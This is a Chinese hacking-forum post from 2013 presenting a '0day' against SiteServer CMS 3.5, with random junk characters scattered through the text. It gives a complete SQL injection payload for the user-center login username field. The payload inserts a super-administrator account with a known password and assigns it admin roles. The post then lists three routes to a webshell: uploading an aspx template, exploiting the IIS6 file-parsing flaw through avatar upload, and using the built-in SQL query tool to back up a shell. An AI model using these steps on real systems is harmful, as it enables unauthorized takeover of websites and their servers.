找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2138|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
7 R$ P8 M  f7 T- c- \' Y! g
* `9 Y" l9 H& o- {. q: z# gstieserver官网:www.siteserver.cn' ^$ v+ a- M- @9 n5 D, e

* p, }0 r# J6 ]# f
" j: R% K/ G2 R/ k/ h1 X/ y. m! j% M: _  L
EXP:
: H: a. y6 R1 `7 G
3 `# s5 k5 i: h; z! ]9 v) G直接访问UserCenter/login.aspx4 U2 G* }: y7 T$ j2 ?1 a

" A" i9 _1 f  U* O( T- {$ j! P
3 X  O# b2 E/ t1 O
* r( L1 U/ z/ R' K用户名处输入:2 q. W% J: M- G8 ?8 W! V  H; k

# l6 a& n. t0 P) b4 \1 I: A123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--9 S5 h6 N& k* G4 S

) k, X) r3 S  ~8 P
( o/ x: ]! \$ N: H4 V1 A/ x  R2 W0 y& `" L2 W7 }
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
. S- r' F4 J7 B, Y2 A: M3 G) O
# b2 m: b% b! E1 O2 I
0 c! W2 }/ @4 W1 R! g; {. v9 I7 Z& t! Z/ S) B9 t+ e
之后再访问后台SiteServer/login.aspx用插入的用户登陆
" o, x; W" X- ]  x' V4 g! I2 S1 p0 K4 b/ h; @5 O, b
: \% Q" B6 ~6 A  \* ?
8 n  d0 o  g" `/ c0 X3 N, i
后台拿webshell的三种方法:
( @# M9 H) B6 o! L- G0 d, V2 }0 I7 x5 U+ \, b+ M( \  A
一、# S5 S3 @8 D' @8 b( z- ^
- l: E' G: H! V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
6 F$ K7 A% l9 ]6 x6 N$ @& \1 }
二、
: L; o, q; [7 ~3 s
5 m) i0 ~2 Q* n+ I2 `成员权限-》添加用户-》用户名为:1.asp
6 g/ q  O4 l0 u
8 t. I& j. n! P' D! m( xhttp://127.0.0.1/usercenter/( c0 K- m9 _4 x1 t( F# I3 ^, r3 i
7 m) D: J! |0 C6 L# L  Z
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ P. c8 h) k0 ^$ L" Q

: C  ^, H  t4 V! r( _2 K(ps:后台添加用户时不会验证是否含有非法字符)/ \0 x0 Z- ]9 Q; O: E6 W: x$ A

/ R2 Z; |' [0 C; b三、& L/ Q, J2 x) }. b; P# z. f
& e8 x8 d7 o1 Y9 Z5 _3 T: p3 z
系统工具-》实用工具-》机器参数查看- S1 W  ?5 ~3 d5 q/ K4 I* v5 a2 i' |8 R
可以看到数据库类型、名称,WEB路径  Z/ O7 M8 M* U- p# ~- O& ~

: y5 t0 o  b5 M" ~, T系统工具-》数据库工具-》SQL语句查询
- O% V$ h4 E) ^( v9 `# H4 Q这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。4 d) v- O: {& \2 L% O* }( v
. k6 z, |$ A  ]! \; M7 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表